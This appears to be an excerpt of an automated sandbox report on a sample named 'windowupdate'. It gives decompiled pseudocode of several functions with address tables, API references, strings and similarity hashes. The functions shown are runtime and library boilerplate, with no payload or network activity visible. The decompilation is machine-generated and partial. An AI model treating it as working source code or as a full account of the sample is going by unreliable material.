                      0x00dc0ac5
                      0x00dc0ad0
                      0x00dc0ad7
                      0x00dc0ad8
                      0x00dc0ae9
                      0x00dc0aeb
                      0x00dc0aec
                      0x00dc0af1
                      0x00dc0af3
                      0x00dc0afa
                      0x00dc0b00
                      0x00dc0b03
                      0x00dc0b0f
                      0x00dc0b12
                      0x00dc0b19
                      0x00dc0b2e
                      0x00dc0b43
                      0x00dc0b48
                      0x00dc0b55
                      0x00dc0b5e
                      0x00dc0b61
                      0x00dc0b66
                      0x00dc0b70
                      0x00dc0b7d
                      0x00dc0b88
                      0x00dc0b8b
                      0x00dc0b92
                      0x00dc0b97
                      0x00dc0b98
                      0x00dc0b9c
                      0x00dc0ba4
                      0x00dc0bbf

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC0B2E
                        • Part of subcall function 00D458B0: VariantInit.OLEAUT32(?), ref: 00D459A4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0B92
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Flapping for Sink No. XX., xrefs: 00DC0B20
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Flapping for Sink No. XX.
                      • API String ID: 2532982526-3528622240
                      • Opcode ID: a3ed391b876a907992625f98198570f9fbbdbc409ade88b982bef9a4ad2f14cb
                      • Instruction ID: d8d3576cb5f4f7a50e9fe8398fd3606ae588b7038d7b2aa5b3c93a57047ba345
                      • Opcode Fuzzy Hash: a3ed391b876a907992625f98198570f9fbbdbc409ade88b982bef9a4ad2f14cb
                      • Instruction Fuzzy Hash: E7219DB1E042099FDB14EF54DC51BAEB7B8FF04310F4042A9E419A7382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC0C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00DC0C00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0xdc572e);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xdf600c; // 0x71e60372
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00D31AB0();
				_v36 = 0;
				_v40 = 0;
				E00D82DE0( &_v144, 0x64, "Server Quacking for Sink No. XX.");
				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = E00D32F30( &_v156);
				_t16 = _v24 + 0x24; // 0xf0000ff
				E00D456B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E00D330B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E00DC14C0(_t65, 0xdc0d04);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x00dc0c00
                      0x00dc0c03
                      0x00dc0c05
                      0x00dc0c10
                      0x00dc0c17
                      0x00dc0c18
                      0x00dc0c29
                      0x00dc0c2b
                      0x00dc0c2c
                      0x00dc0c31
                      0x00dc0c33
                      0x00dc0c3a
                      0x00dc0c40
                      0x00dc0c43
                      0x00dc0c4f
                      0x00dc0c52
                      0x00dc0c59
                      0x00dc0c6e
                      0x00dc0c83
                      0x00dc0c88
                      0x00dc0c95
                      0x00dc0c9e
                      0x00dc0ca1
                      0x00dc0ca6
                      0x00dc0cb0
                      0x00dc0cbd
                      0x00dc0cc8
                      0x00dc0ccb
                      0x00dc0cd2
                      0x00dc0cd7
                      0x00dc0cd8
                      0x00dc0cdc
                      0x00dc0ce4
                      0x00dc0cff

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC0C6E
                        • Part of subcall function 00D456B0: VariantInit.OLEAUT32(?), ref: 00D457A4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0CD2
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Quacking for Sink No. XX., xrefs: 00DC0C60
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Quacking for Sink No. XX.
                      • API String ID: 2532982526-3989898170
                      • Opcode ID: 7f2ce0266e172ba64458da58f639bb63f48f59e08ce6d2864685c4ac3bc108b7
                      • Instruction ID: 674280895c7b28616f076b04f154eecd6614e0aa81d7a0488e7bd81856aba64e
                      • Opcode Fuzzy Hash: 7f2ce0266e172ba64458da58f639bb63f48f59e08ce6d2864685c4ac3bc108b7
                      • Instruction Fuzzy Hash: E3216DB1E042199FDB14EF54DC51BAEB7B8FF04310F5042A9E419A7382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D580D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                      Download Yara Rule
                      C-Code - Quality: 80%
                      			E00D580D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _t15;
				intOrPtr _t36;
				intOrPtr _t37;

				_t15 =  *0xf20640; // 0x0
				if( *_t15 != 0) {
					_push("??_C");
					_v8 = E00D4EFF0() - 1;
					_t36 =  *0xf20640; // 0x0
					_v12 = _t36;
					if(E00D92B40(_v12, "??_C", _v8) != 0) {
						E00D4F350(_a4, 2);
						return _a4;
					}
					_push("??_C");
					_v20 = E00D4EFF0() - 1;
					_t37 =  *0xf20640; // 0x0
					_v16 = _t37;
					 *0xf20640 = _v16 + _v20;
					_push(1);
					E00D57F80(__ebx, __edi, __esi, _a4, 0);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}










                      0x00d580d6
                      0x00d580e0
                      0x00d580f1
                      0x00d58101
                      0x00d58104
                      0x00d5810a
                      0x00d58124
                      0x00d58167
                      0x00000000
                      0x00d5816c
                      0x00d58126
                      0x00d58136
                      0x00d58139
                      0x00d5813f
                      0x00d58148
                      0x00d5814d
                      0x00d58155
                      0x00000000
                      0x00d5815d
                      0x00d580e7
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D580E7
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::Node::makeStatus
                      • String ID: ??_C
                      • API String ID: 637594406-1959642359
                      • Opcode ID: e55f7ef8def0e8a80470682203783a1506b96e833417427687e1a04430de6c1f
                      • Instruction ID: 042c95a0ddaedb5466e6e22cf0847ee31549d5096a1d85f3fd42f73623ce13a6
                      • Opcode Fuzzy Hash: e55f7ef8def0e8a80470682203783a1506b96e833417427687e1a04430de6c1f
                      • Instruction Fuzzy Hash: BA118675A00209AFDF14DF54D852EAE7BB0FF44304F044058FC499B396DB71EA159BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3FEA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D3FEA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, unsigned int _a4) {
				signed int _v8;
				char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _t24;
				void* _t25;
				void* _t39;
				void* _t40;

				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_v9 = 0;
				if(_a4 != 0) {
					_t43 = _a4 >> 0x10;
					if(_a4 >> 0x10 == 0) {
						_v16 = _a4 & 0xffff;
						_t24 = E00D40D40(_v8, _t43, _v16);
						_t44 = _t24;
						if(_t24 == 0) {
							_t25 = E00D3F1C0(0xf23744);
							E00D323E0(__ebx, __edi, __esi, _t44, E00D323B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\cstringt.h", 0xa9b), _t25, 2, "Warning: implicit LoadString(%u) failed\n", _v16);
							_t40 = _t40 + 0x14;
						}
						_v9 = 1;
					}
				}
				return E00DC1520(_v9, _t39 - _t40 + 0x14);
			}













                      0x00d3feab
                      0x00d3feae
                      0x00d3feb1
                      0x00d3feb4
                      0x00d3feb7
                      0x00d3feba
                      0x00d3febd
                      0x00d3fec5
                      0x00d3fecd
                      0x00d3fecf
                      0x00d3fedd
                      0x00d3fee7
                      0x00d3feec
                      0x00d3feee
                      0x00d3ff00
                      0x00d3ff19
                      0x00d3ff1e
                      0x00d3ff1e
                      0x00d3ff21
                      0x00d3ff21
                      0x00d3fecf
                      0x00d3ff35

                      APIs
                      • _Smanip.LIBCPMTD ref: 00D3FF13
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h, xrefs: 00D3FF0B
                      • Warning: implicit LoadString(%u) failed, xrefs: 00D3FEF4
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h$Warning: implicit LoadString(%u) failed
                      • API String ID: 1089072215-3286162589
                      • Opcode ID: 7bb60ceb465f6a632a5f589f9c2c5daa05c5e69b71eed135dbd554466fe96472
                      • Instruction ID: ff83d6e03bfcf31621e7cd31874059c13a7198d0c6ef8009dbbefee436f47b6b
                      • Opcode Fuzzy Hash: 7bb60ceb465f6a632a5f589f9c2c5daa05c5e69b71eed135dbd554466fe96472
                      • Instruction Fuzzy Hash: B91130B4D04249AEDB04EFA8D802BADBBB49F04340F0480B9E909A7282E6759A048B71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D47560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 49%
                      			E00D47560(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t9;
				void* _t19;

				if( *0xf2027c == 0) {
					__eflags = _a4 - 0xffffffff;
					if(__eflags == 0) {
						_t9 = L00D84930(__eflags, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcstartup\\src\\misc\\thread_safe_statics.cpp", 0xa6, 0, "%ls", 0);
						__eflags = _t9 - 1;
						if(_t9 == 1) {
							asm("int3");
						}
					}
					E00D47550(_t9);
					_t19 =  *0xf20260; // 0x0
					return E00D474F0(WaitForSingleObjectEx(_t19, _a4, 0));
				}
				_v12 =  *0xf2027c;
				_v8 = _v12;
				 *0xdc62b0(0xf2025c, 0xf20264, _a4);
				return _v8();
			}







                      0x00d4756d
                      0x00d47599
                      0x00d4759d
                      0x00d475b4
                      0x00d475bc
                      0x00d475bf
                      0x00d475c1
                      0x00d475c1
                      0x00d475bf
                      0x00d475c2
                      0x00d475cd
                      0x00000000
                      0x00d475da
                      0x00d47574
                      0x00d47588
                      0x00d4758e
                      0x00000000

                      APIs
                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 00D475D4
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp, xrefs: 00D475AD
                      • %ls, xrefs: 00D475A1
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ObjectSingleWait
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp
                      • API String ID: 24740636-368162206
                      • Opcode ID: 427de46dd2409704ccd41331b7fc0e8d2a4c3b7c665b4e976d806a788e129640
                      • Instruction ID: a039832e6d20d99b953c56e9c71d57855e69db770665e9e6ca657cf076e39c3a
                      • Opcode Fuzzy Hash: 427de46dd2409704ccd41331b7fc0e8d2a4c3b7c665b4e976d806a788e129640
                      • Instruction Fuzzy Hash: A6018F31A44309EFDB24EFA4EC4AF697730AB44701F208259F5495A2D2DB70AA009BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4B220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D4B220(intOrPtr* _a4, signed char _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				void* _t28;
				void* _t36;
				void* _t37;

				if((_a8 & 0x000000ff) != 0) {
					_v8 =  *_a4;
					if( *_v8 == 0xe06d7363) {
						_t30 = _v8;
						if( *((intOrPtr*)(_v8 + 0x10)) == 3) {
							if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_v8 + 0x14)) == 0x19930521) {
								L6:
								 *((intOrPtr*)(E00D4C670(_t28, _t30, _t36, _t37) + 0x10)) = _v8;
								_v12 =  *((intOrPtr*)(_a4 + 4));
								 *((intOrPtr*)(E00D4C670(_t28,  *((intOrPtr*)(_a4 + 4)), _t36, _t37) + 0x14)) = _v12;
								E00D89BF0( *((intOrPtr*)(_a4 + 4)));
							} else {
								_t30 = _v8;
								if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930522) {
									goto L6;
								}
							}
						}
					}
				}
				return 0;
			}








                      0x00d4b22c
                      0x00d4b233
                      0x00d4b23f
                      0x00d4b241
                      0x00d4b248
                      0x00d4b254
                      0x00d4b26e
                      0x00d4b276
                      0x00d4b27f
                      0x00d4b28a
                      0x00d4b28d
                      0x00d4b262
                      0x00d4b262
                      0x00d4b26c
                      0x00000000
                      0x00000000
                      0x00d4b26c
                      0x00d4b254
                      0x00d4b248
                      0x00d4b23f
                      0x00d4b297

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B26E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B282
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 5eb352aa750afaac9d54a6ba8ca128d4154bd8edf7bd430b78a96139b86eff4c
                      • Instruction ID: dbefc3115991939022736f11511453654e12a4d13cab8e79001bf98c2124e634
                      • Opcode Fuzzy Hash: 5eb352aa750afaac9d54a6ba8ca128d4154bd8edf7bd430b78a96139b86eff4c
                      • Instruction Fuzzy Hash: 43014834A01208EF8F18DFA4C18086DBBB6FF50311B688499D8485B326D770EF41DBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D32500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D32500(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t10;
				void* _t24;
				void* _t25;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_t10 = E00D3F1D0(0xf23740);
				E00D323E0(__ebx, __edi, __esi, __eflags, E00D323B0( &_v12, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlexcept.h", 0x42), _t10, 0, "AtlThrow: hr = 0x%x\n", _a4);
				E00D324E0( &_v16, _a4);
				return E00DC1520(E00D4BE10( &_v16, 0xdf4690), _t24 - _t25 + 0x20);
			}









                      0x00d32506
                      0x00d3250d
                      0x00d32514
                      0x00d3252b
                      0x00d32541
                      0x00d32550
                      0x00d32570

                      APIs
                      • _Smanip.LIBCPMTD ref: 00D3253B
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                        • Part of subcall function 00D4BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 00D4BEAA
                      Strings
                      • AtlThrow: hr = 0x%x, xrefs: 00D3251F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h, xrefs: 00D32533
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckExceptionRaiseSmanipStackVars@8
                      • String ID: AtlThrow: hr = 0x%x$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h
                      • API String ID: 1594162562-3884214373
                      • Opcode ID: d3620298c7a84c9df47991e4e523d39f92d2312b46fb8538d3e828a8adb765a4
                      • Instruction ID: cc1ad81b6da92bdad27ed7f6a7f25c63116f1368860655d71f44ebe767e31b46
                      • Opcode Fuzzy Hash: d3620298c7a84c9df47991e4e523d39f92d2312b46fb8538d3e828a8adb765a4
                      • Instruction Fuzzy Hash: 32F054B6E443087FDB00FBA9DC43EFD7738DB50740F408568BA052B282EAB4A65487B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D46B65 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 68%
                      			E00D46B65(void* __ecx) {
				void* __edi;
				long _t7;
				void* _t13;
				intOrPtr* _t19;
				void* _t21;

				_t13 = __ecx;
				_t21 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t21 != 0) {
					_t19 = E00D4676A(_t13, 0xf2020c);
					 *_t21 = 0 | _t19 == 0x00000000;
					if(_t19 == 0) {
						_t7 = E00D469E3(_t19);
					} else {
						 *0xdc62b0();
						_t7 =  *_t19();
					}
					 *(_t21 + 4) = _t7;
					if(_t7 != 0) {
						return _t21;
					} else {
						HeapFree(GetProcessHeap(), _t7, _t21);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}








                      0x00d46b65
                      0x00d46b77
                      0x00d46b7b
                      0x00d46b8f
                      0x00d46b96
                      0x00d46b9a
                      0x00d46ba8
                      0x00d46b9c
                      0x00d46b9e
                      0x00d46ba4
                      0x00d46ba4
                      0x00d46bad
                      0x00d46bb3
                      0x00d46bc9
                      0x00d46bb5
                      0x00d46bbe
                      0x00000000
                      0x00d46bbe
                      0x00d46b7d
                      0x00d46b7d
                      0x00d46b80
                      0x00d46b80

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00D34CBB), ref: 00D46B6A
                      • HeapAlloc.KERNEL32(00000000,?,00D34CBB), ref: 00D46B71
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00D34CBB), ref: 00D46BB7
                      • HeapFree.KERNEL32(00000000,?,00D34CBB), ref: 00D46BBE
                        • Part of subcall function 00D469E3: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A07
                        • Part of subcall function 00D469E3: HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A0E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$Alloc$Free
                      • String ID:
                      • API String ID: 1864747095-0
                      • Opcode ID: 3b63eacf5d220a1f85e46ecbc0ab4ef704cbb8932829e46644916637dbe32133
                      • Instruction ID: c284d56aef8b886e75686849da733faee6ef31f98cb7a54187cfb77b6954701d
                      • Opcode Fuzzy Hash: 3b63eacf5d220a1f85e46ecbc0ab4ef704cbb8932829e46644916637dbe32133
                      • Instruction Fuzzy Hash: F2F05E72644B1397CB252BB8BD0DE5A2A65EF82BA17154129F587D6390DE60C8009B72
                      Uniqueness

                      Uniqueness Score: -1.00%